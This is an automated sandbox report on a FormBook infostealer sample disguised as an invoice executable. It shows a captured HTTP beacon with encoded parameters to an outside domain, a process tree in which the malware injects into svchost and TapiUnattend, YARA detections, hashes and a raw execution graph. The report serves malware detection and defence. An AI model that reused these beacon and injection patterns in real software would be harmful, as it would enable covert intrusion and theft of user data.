                                  40192.168.2.45584954.81.206.248805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:33:01.185905933 CEST506OUTGET /zl4r/?h2Pt9=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.wajf.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:33:01.650978088 CEST1236INHTTP/1.1 200 OK
                                  Date: Mon, 16 Sep 2024 07:33:01 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                  Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                  Sep 16, 2024 09:33:01.650999069 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                  Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                  Sep 16, 2024 09:33:01.651010036 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                  Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                  Sep 16, 2024 09:33:01.651021957 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                  Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                  Sep 16, 2024 09:33:01.651032925 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                  Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                  Sep 16, 2024 09:33:01.651045084 CEST1236INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                  Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
                                  Sep 16, 2024 09:33:01.651057959 CEST1236INData Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
                                  Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
                                  Sep 16, 2024 09:33:01.651067972 CEST1236INData Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
                                  Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
                                  Sep 16, 2024 09:33:01.651079893 CEST1236INData Raw: 33 34 33 32 39 63 31 37 2e 36 39 31 34 36 2c 30 2c 32 38 2e 31 33 37 38 34 2c 39 2e 30 35 35 31 37 2c 32 38 2e 31 33 37 38 34 2c 32 36 2e 36 30 35 36 35 76 35 30 2e 30 30 35 32 39 41 32 2e 38 30 34 33 36 2c 32 2e 38 30 34 33 36 2c 30 2c 30 2c 31
                                  Data Ascii: 34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"></path><path d="M344.50486,117.228H299.0941v.42056c0,8.07577,3.345,17.68641,16.71576,17.68641,10.16713,0,19.78114-.83473,25.
                                  Sep 16, 2024 09:33:01.651092052 CEST1236INData Raw: 31 31 32 35 36 76 35 2e 32 37 39 38 38 63 30 2c 2e 38 31 31 38 34 2d 2e 36 34 37 33 33 2c 31 2e 32 31 35 39 32 2d 31 2e 34 35 38 38 34 2c 31 2e 32 31 35 39 32 68 2d 2e 32 34 36 32 38 61 37 30 2e 33 35 35 33 35 2c 37 30 2e 33 35 35 33 35 2c 30 2c
                                  Data Ascii: 11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849-7.79988,10.6422v7.557c0,8.45056,3.9822,10.64186,7.79988,10.64186a70.19544,70.19544,0,0,0,10.48137-.56826h.24628c.81
                                  Sep 16, 2024 09:33:01.651741982 CEST421INData Raw: 31 2e 36 33 38 32 34 2c 30 2c 30 2c 31 2d 31 2e 35 34 37 33 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32 35 34 38 63 30 2d 31 30 2e 32 33 39 38 31 2c 36 2e 30 39 34 37 36 2d 31 35 2e 35 32 31 33 38 2c 31 36 2e 34 31 31 36 31 2d 31 35 2e 35 32
                                  Data Ascii: 1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.72429,3.25111,2.51663-2.193,6.25256-3.25111,10.80638-3.25111h1.9514c10.31719,0,16.412,5.28157,16.412,15.52138v29.16333A1.63


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Click to jump to process

                                  Target ID:0
                                  Start time:03:28:58
                                  Start date:16/09/2024
                                  Path:C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
                                  Imagebase:0x300000
                                  File size:1'722'368 bytes
                                  MD5 hash:BC8D560138E7AC511F70880FC394AD2D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:1
                                  Start time:03:28:59
                                  Start date:16/09/2024
                                  Path:C:\Windows\SysWOW64\svchost.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
                                  Imagebase:0xed0000
                                  File size:46'504 bytes
                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:03:29:33
                                  Start date:16/09/2024
                                  Path:C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe"
                                  Imagebase:0x6d0000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:6
                                  Start time:03:29:34
                                  Start date:16/09/2024
                                  Path:C:\Windows\SysWOW64\TapiUnattend.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\TapiUnattend.exe"
                                  Imagebase:0x820000
                                  File size:12'800 bytes
                                  MD5 hash:D5BFFD755F566AAACB57CF83FDAA5CD0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:false

                                  Target ID:7
                                  Start time:03:29:50
                                  Start date:16/09/2024
                                  Path:C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe"
                                  Imagebase:0x6d0000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:8
                                  Start time:03:30:02
                                  Start date:16/09/2024
                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                  Imagebase:0x7ff6bf500000
                                  File size:676'768 bytes
                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:2.8%
                                    Dynamic/Decrypted Code Coverage:1.1%
                                    Signature Coverage:5.3%
                                    Total number of Nodes:1649
                                    Total number of Limit Nodes:45
                                    execution_graph 94937 353f75 94948 31ceb1 94937->94948 94939 353f8b 94940 354006 94939->94940 95015 31e300 23 API calls 94939->95015 94957 30bf40 94940->94957 94942 354052 94946 354a88 94942->94946 95017 37359c 82 API calls __wsopen_s 94942->95017 94945 353fe6 94945->94942 95016 371abf 22 API calls 94945->95016 94949 31ced2 94948->94949 94950 31cebf 94948->94950 94951 31cf05 94949->94951 94952 31ced7 94949->94952 95018 30aceb 23 API calls ISource 94950->95018 95029 30aceb 23 API calls ISource 94951->95029 95019 31fddb 94952->95019 94956 31cec9 94956->94939 95042 30adf0 94957->95042 94959 30bf9d 94960 3504b6 94959->94960 94961 30bfa9 94959->94961 95071 37359c 82 API calls __wsopen_s 94960->95071 94963 3504c6 94961->94963 94964 30c01e 94961->94964 95072 37359c 82 API calls __wsopen_s 94963->95072 95047 30ac91 94964->95047 94967 30c603 94967->94942 94969 367120 22 API calls 94986 30c039 ISource __fread_nolock 94969->94986 94970 30c7da 95060 31fe0b 94970->95060 94975 3504f5 94978 35055a 94975->94978 95073 31d217 207 API calls 94975->95073 94978->94967 95074 37359c 82 API calls __wsopen_s 94978->95074 94979 30ec40 207 API calls 94979->94986 94980 31fe0b 22 API calls 94987 30c350 ISource __fread_nolock 94980->94987 94981 30af8a 22 API calls 94981->94986 94982 30c808 __fread_nolock 94982->94980 94983 35091a 95108 373209 23 API calls 94983->95108 94986->94967 94986->94969 94986->94970 94986->94975 94986->94978 94986->94979 94986->94981 94986->94982 94986->94983 94988 3508a5 94986->94988 94992 350591 94986->94992 94993 3508f6 94986->94993 94997 30bbe0 40 API calls 94986->94997 94998 30c237 94986->94998 95001 31fddb 22 API calls 94986->95001 95010 3509bf 94986->95010 95014 31fe0b 22 API calls 94986->95014 95051 30ad81 94986->95051 95076 367099 22 API calls __fread_nolock 94986->95076 95077 385745 54 API calls _wcslen 94986->95077 95078 31aa42 22 API calls ISource 94986->95078 95079 36f05c 40 API calls 94986->95079 95080 30a993 41 API calls 94986->95080 95081 30aceb 23 API calls ISource 94986->95081 95000 30c3ac 94987->95000 95070 31ce17 22 API calls ISource 94987->95070 95082 30ec40 94988->95082 94990 3508cf 94990->94967 95106 30a81b 41 API calls 94990->95106 95075 37359c 82 API calls __wsopen_s 94992->95075 95107 37359c 82 API calls __wsopen_s 94993->95107 94997->94986 95002 30c253 94998->95002 95109 30a8c7 94998->95109 95000->94942 95001->94986 95004 350976 95002->95004 95008 30c297 ISource 95002->95008 95113 30aceb 23 API calls ISource 95004->95113 95008->95010 95058 30aceb 23 API calls ISource 95008->95058 95010->94967 95114 37359c 82 API calls __wsopen_s 95010->95114 95011 30c335 95011->95010 95012 30c342 95011->95012 95059 30a704 22 API calls ISource 95012->95059 95014->94986 95015->94945 95016->94940 95017->94946 95018->94956 95021 31fde0 95019->95021 95022 31fdfa 95021->95022 95026 31fdfc 95021->95026 95030 32ea0c 95021->95030 95037 324ead 7 API calls 2 library calls 95021->95037 95022->94956 95024 32066d 95039 3232a4 RaiseException 95024->95039 95026->95024 95038 3232a4 RaiseException 95026->95038 95027 32068a 95027->94956 95029->94956 95035 333820 _abort 95030->95035 95031 33385e 95041 32f2d9 20 API calls _abort 95031->95041 95033 333849 RtlAllocateHeap 95034 33385c 95033->95034 95033->95035 95034->95021 95035->95031 95035->95033 95040 324ead 7 API calls 2 library calls 95035->95040 95037->95021 95038->95024 95039->95027 95040->95035 95041->95034 95043 30ae01 95042->95043 95046 30ae1c ISource 95042->95046 95115 30aec9 95043->95115 95045 30ae09 CharUpperBuffW 95045->95046 95046->94959 95048 30acae 95047->95048 95049 30acd1 95048->95049 95121 37359c 82 API calls __wsopen_s 95048->95121 95049->94986 95052 30ad92 95051->95052 95053 34fadb 95051->95053 95054 31fddb 22 API calls 95052->95054 95055 30ad99 95054->95055 95122 30adcd 95055->95122 95058->95011 95059->94987 95062 31fddb 95060->95062 95061 32ea0c ___std_exception_copy 21 API calls 95061->95062 95062->95061 95063 31fdfa 95062->95063 95067 31fdfc 95062->95067 95134 324ead 7 API calls 2 library calls 95062->95134 95063->94982 95065 32066d 95136 3232a4 RaiseException 95065->95136 95067->95065 95135 3232a4 RaiseException 95067->95135 95068 32068a 95068->94982 95070->94987 95071->94963 95072->94967 95073->94978 95074->94967 95075->94967 95076->94986 95077->94986 95078->94986 95079->94986 95080->94986 95081->94986 95103 30ec76 ISource 95082->95103 95083 3201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95083->95103 95084 31fddb 22 API calls 95084->95103 95085 30fef7 95093 30a8c7 22 API calls 95085->95093 95099 30ed9d ISource 95085->95099 95088 354b0b 95140 37359c 82 API calls __wsopen_s 95088->95140 95089 30a8c7 22 API calls 95089->95103 95090 354600 95095 30a8c7 22 API calls 95090->95095 95090->95099 95093->95099 95095->95099 95096 320242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95096->95103 95097 30fbe3 95097->95099 95100 354bdc 95097->95100 95105 30f3ae ISource 95097->95105 95098 30a961 22 API calls 95098->95103 95099->94990 95141 37359c 82 API calls __wsopen_s 95100->95141 95101 3200a3 29 API calls pre_c_initialization 95101->95103 95103->95083 95103->95084 95103->95085 95103->95088 95103->95089 95103->95090 95103->95096 95103->95097 95103->95098 95103->95099 95103->95101 95104 354beb 95103->95104 95103->95105 95137 3101e0 207 API calls 2 library calls 95103->95137 95138 3106a0 41 API calls ISource 95103->95138 95142 37359c 82 API calls __wsopen_s 95104->95142 95105->95099 95139 37359c 82 API calls __wsopen_s 95105->95139 95106->94993 95107->94967 95108->94998 95110 30a8ea __fread_nolock 95109->95110 95111 30a8db 95109->95111 95110->95002 95111->95110 95112 31fe0b 22 API calls 95111->95112 95112->95110 95113->95010 95114->94967 95116 30aed9 __fread_nolock 95115->95116 95117 30aedc 95115->95117 95116->95045 95118 31fddb 22 API calls 95117->95118 95119 30aee7 95118->95119 95120 31fe0b 22 API calls 95119->95120 95120->95116 95121->95049 95126 30addd 95122->95126 95123 30adb6 95123->94986 95124 31fddb 22 API calls 95124->95126 95126->95123 95126->95124 95127 30a8c7 22 API calls 95126->95127 95128 30adcd 22 API calls 95126->95128 95129 30a961 95126->95129 95127->95126 95128->95126 95130 31fe0b 22 API calls 95129->95130 95131 30a976 95130->95131 95132 31fddb 22 API calls 95131->95132 95133 30a984 95132->95133 95133->95126 95134->95062 95135->95065 95136->95068 95137->95103 95138->95103 95139->95099 95140->95099 95141->95104 95142->95099 95143 301033 95148 304c91 95143->95148 95147 301042 95149 30a961 22 API calls 95148->95149 95150 304cff 95149->95150 95156 303af0 95150->95156 95153 304d9c 95154 301038 95153->95154 95159 3051f7 22 API calls __fread_nolock 95153->95159 95155 3200a3 29 API calls __onexit 95154->95155 95155->95147 95160 303b1c 95156->95160 95159->95153 95161 303b0f 95160->95161 95162 303b29 95160->95162 95161->95153 95162->95161 95163 303b30 RegOpenKeyExW 95162->95163 95163->95161 95164 303b4a RegQueryValueExW 95163->95164 95165 303b80 RegCloseKey 95164->95165 95166 303b6b 95164->95166 95165->95161 95166->95165 95167 303156 95170 303170 95167->95170 95171 303187 95170->95171 95172 3031e9 95171->95172 95173 3031eb 95171->95173 95174 30318c 95171->95174 95177 3031d0 DefWindowProcW 95172->95177 95178 3031f1 95173->95178 95179 342dfb 95173->95179 95175 303265 PostQuitMessage 95174->95175 95176 303199 95174->95176 95183 30316a 95175->95183 95181 3031a4 95176->95181 95182 342e7c 95176->95182 95177->95183 95184 3031f8 95178->95184 95185 30321d SetTimer RegisterWindowMessageW 95178->95185 95219 3018e2 10 API calls 95179->95219 95187 342e68 95181->95187 95188 3031ae 95181->95188 95234 36bf30 34 API calls ___scrt_fastfail 95182->95234 95191 303201 KillTimer 95184->95191 95192 342d9c 95184->95192 95185->95183 95189 303246 CreatePopupMenu 95185->95189 95186 342e1c 95220 31e499 42 API calls 95186->95220 95233 36c161 27 API calls ___scrt_fastfail 95187->95233 95195 342e4d 95188->95195 95196 3031b9 95188->95196 95189->95183 95215 3030f2 Shell_NotifyIconW ___scrt_fastfail 95191->95215 95198 342dd7 MoveWindow 95192->95198 95199 342da1 95192->95199 95195->95177 95232 360ad7 22 API calls 95195->95232 95202 3031c4 95196->95202 95203 303253 95196->95203 95197 342e8e 95197->95177 95197->95183 95198->95183 95204 342dc6 SetFocus 95199->95204 95205 342da7 95199->95205 95201 303263 95201->95183 95202->95177 95221 3030f2 Shell_NotifyIconW ___scrt_fastfail 95202->95221 95217 30326f 44 API calls ___scrt_fastfail 95203->95217 95204->95183 95205->95202 95208 342db0 95205->95208 95206 303214 95216 303c50 DeleteObject DestroyWindow 95206->95216 95218 3018e2 10 API calls 95208->95218 95213 342e41 95222 303837 95213->95222 95215->95206 95216->95183 95217->95201 95218->95183 95219->95186 95220->95202 95221->95213 95223 303862 ___scrt_fastfail 95222->95223 95235 304212 95223->95235 95226 3038e8 95228 343386 Shell_NotifyIconW 95226->95228 95229 303906 Shell_NotifyIconW 95226->95229 95239 303923 95229->95239 95231 30391c 95231->95172 95232->95172 95233->95201 95234->95197 95236 3435a4 95235->95236 95237 3038b7 95235->95237 95236->95237 95238 3435ad DestroyIcon 95236->95238 95237->95226 95261 36c874 42 API calls _strftime 95237->95261 95238->95237 95240 30393f 95239->95240 95259 303a13 95239->95259 95262 306270 95240->95262 95243 343393 LoadStringW 95246 3433ad 95243->95246 95244 30395a 95267 306b57 95244->95267 95250 30a8c7 22 API calls 95246->95250 95253 303994 ___scrt_fastfail 95246->95253 95247 30396f 95248 30397c 95247->95248 95249 3433c9 95247->95249 95248->95246 95251 303986 95248->95251 95252 306350 22 API calls 95249->95252 95250->95253 95279 306350 95251->95279 95255 3433d7 95252->95255 95257 3039f9 Shell_NotifyIconW 95253->95257 95255->95253 95288 3033c6 95255->95288 95257->95259 95258 3433f9 95260 3033c6 22 API calls 95258->95260 95259->95231 95260->95253 95261->95226 95263 31fe0b 22 API calls 95262->95263 95264 306295 95263->95264 95265 31fddb 22 API calls 95264->95265 95266 30394d 95265->95266 95266->95243 95266->95244 95268 344ba1 95267->95268 95269 306b67 _wcslen 95267->95269 95298 3093b2 95268->95298 95272 306ba2 95269->95272 95273 306b7d 95269->95273 95271 344baa 95271->95271 95274 31fddb 22 API calls 95272->95274 95297 306f34 22 API calls 95273->95297 95277 306bae 95274->95277 95276 306b85 __fread_nolock 95276->95247 95278 31fe0b 22 API calls 95277->95278 95278->95276 95280 306362 95279->95280 95281 344a51 95279->95281 95302 306373 95280->95302 95312 304a88 22 API calls __fread_nolock 95281->95312 95284 30636e 95284->95253 95285 344a5b 95286 344a67 95285->95286 95287 30a8c7 22 API calls 95285->95287 95287->95286 95289 3033dd 95288->95289 95290 3430bb 95288->95290 95318 3033ee 95289->95318 95292 31fddb 22 API calls 95290->95292 95294 3430c5 _wcslen 95292->95294 95293 3033e8 95293->95258 95295 31fe0b 22 API calls 95294->95295 95296 3430fe __fread_nolock 95295->95296 95297->95276 95299 3093c0 95298->95299 95301 3093c9 __fread_nolock 95298->95301 95300 30aec9 22 API calls 95299->95300 95299->95301 95300->95301 95301->95271 95304 306382 95302->95304 95308 3063b6 __fread_nolock 95302->95308 95303 344a82 95306 31fddb 22 API calls 95303->95306 95304->95303 95305 3063a9 95304->95305 95304->95308 95313 30a587 95305->95313 95309 344a91 95306->95309 95308->95284 95310 31fe0b 22 API calls 95309->95310 95311 344ac5 __fread_nolock 95310->95311 95312->95285 95314 30a59d 95313->95314 95317 30a598 __fread_nolock 95313->95317 95315 34f80f 95314->95315 95316 31fe0b 22 API calls 95314->95316 95316->95317 95317->95308 95319 3033fe _wcslen 95318->95319 95320 303411 95319->95320 95321 34311d 95319->95321 95322 30a587 22 API calls 95320->95322 95323 31fddb 22 API calls 95321->95323 95324 30341e __fread_nolock 95322->95324 95325 343127 95323->95325 95324->95293 95326 31fe0b 22 API calls 95325->95326 95327 343157 __fread_nolock 95326->95327 95328 302e37 95329 30a961 22 API calls 95328->95329 95330 302e4d 95329->95330 95407 304ae3 95330->95407 95332 302e6b 95421 303a5a 95332->95421 95334 302e7f 95428 309cb3 95334->95428 95339 342cb0 95472 372cf9 95339->95472 95340 302ead 95344 30a8c7 22 API calls 95340->95344 95342 342cc3 95343 342ccf 95342->95343 95498 304f39 95342->95498 95348 304f39 68 API calls 95343->95348 95346 302ec3 95344->95346 95456 306f88 22 API calls 95346->95456 95351 342ce5 95348->95351 95349 302ecf 95350 309cb3 22 API calls 95349->95350 95352 302edc 95350->95352 95504 303084 22 API calls 95351->95504 95457 30a81b 41 API calls 95352->95457 95354 302eec 95357 309cb3 